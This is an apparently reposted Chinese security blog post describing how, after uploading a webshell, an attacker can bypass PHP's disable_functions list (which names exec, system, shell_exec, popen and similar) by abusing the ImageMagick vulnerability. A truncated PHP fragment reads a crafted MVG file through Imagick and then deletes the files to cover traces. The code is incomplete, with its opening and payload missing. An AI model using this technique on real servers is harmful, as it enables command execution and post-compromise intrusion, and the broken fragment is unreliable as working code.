最近ImageMagick漏洞比较火,上传一个图片,搞定一台服务器已经不在话下。。。收集一些大牛们YD的思路,供大学学习。。
当你上传了一个webshell,遇到下面的情况如何解决?
disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
根据以前的经验,有的是使用dl扩展来执行命令,不过我从未测试过,现在有了新的姿势,当然也是要有ImageMagick组件了。
readImage('KKKK.mvg');
$thumb->writeImage('KKKK.png');
$thumb->clear();
$thumb->destroy();
unlink("KKKK.mvg");
unlink("KKKK.png");
?>
原文地址:http://zone.wooyun.org/content/27038
from www.waitalone.cn.thanks for it.
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论